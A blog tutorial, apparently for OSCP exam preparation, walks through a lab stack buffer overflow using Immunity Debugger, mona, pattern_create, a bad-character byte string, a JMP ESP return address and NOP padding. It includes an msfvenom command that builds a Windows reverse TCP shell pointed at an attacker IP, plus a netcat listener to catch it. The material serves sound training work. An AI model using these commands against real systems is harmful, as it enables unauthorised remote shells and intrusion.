Buffer Overflow Preparation for OSCP

YevhSec1
4 min readDec 2, 2021

In this small article, I would like to describe the main steps in the most straightforward words and provide a short overview of “how the buffer overflow” might be done. You should be ready to solve this type of task for the OSCP exam.

What you will have to work with during this task:

  1. Python exploit code
  2. Immunity debugger
  3. Mona for Immunity debugger

Main steps:

  1. Connection to the Debugging machine
  2. Fuzzing(Skip for OSCP)
  3. Identifying the EIP register offset value
  4. Controlling the EIP value
  5. Identifying the bad character
  6. Identifying the returning address
  7. Adding padding
  8. Generation a reverse shell with msfvenom
  9. Getting a shell

Steps overview:

1)Connection to the Debugging machine

xfreerdp +clipboard /u:USERNAME /p:PASSWORD /cert:ignore /v:MACHINE_IP /workarea

3)Identifying the EIP register offset value

Note: Generate a cyclic pattern of a length 400 bytes longer that the string that crashed the server. VALUE = CRASH + 400

locate pattern_create.rb

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l VALUE

Set up Mona folder

!mona config -set workingfolder c:\mona\%p

Find EIP offset

!mona findmsp -distance VALUE

Mona result

Add it as offset value

4)Controlling the EIP value

Add the “BBBB” as the “retn” value. Then check the EIP register value.

Exploit

Result

5)Identifying the bad character

Note: the \x00 is a bad character by default. User the following string as a payload for identifying the bad characters.

\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff

Exploit

Set up the mona bytearray

!mona bytearray -b “\x00”

ESP register value after crash

Mona

!mona compare -f C:\mona\oscp\bytearray.bin -a ESP_ADRESS

Remove the bad char, crash again, add the removed char to mona byte array

!mona bytearray -b “\x00\x07”

Compare after crash the mona bytearray with ESP register value

Remove char

Note: you should remove all possibly bad char one by one. In the end you will have the list of bad char. For example, “\x00\x07\x2e\xa0”

6)Identifying the returning address

!mona jmp -r esp -cpb “\x00\x07\x2e\xa0”

So we have the “0x625011af” value

Convert the returning address value to which we can use in our Python code

0x625011af → \xaf\x11\x50\x62

7) Adding padding

padding = b”\x90" * 16

8) Generation a reverse shell with msfvenom

msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT EXITFUNC=thread -b “BAD_CHAR” -f python -v payload

Example

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.3 LPORT=443 EXITFUNC=thread -b “\x00\x07\x2e\xa0” -f python -v payload

Put the exploit code as a Payload to the final exploit

9)Getting a shell

Start NC

sudo nc -lvnp 443

Run exploit and get a shell

Follow me and stay secure!

--

--

YevhSec1

MSc in Cyber Security, OSCP, eWPTXv2, CEH Master. Awarded by Apple, Trello, Paysera..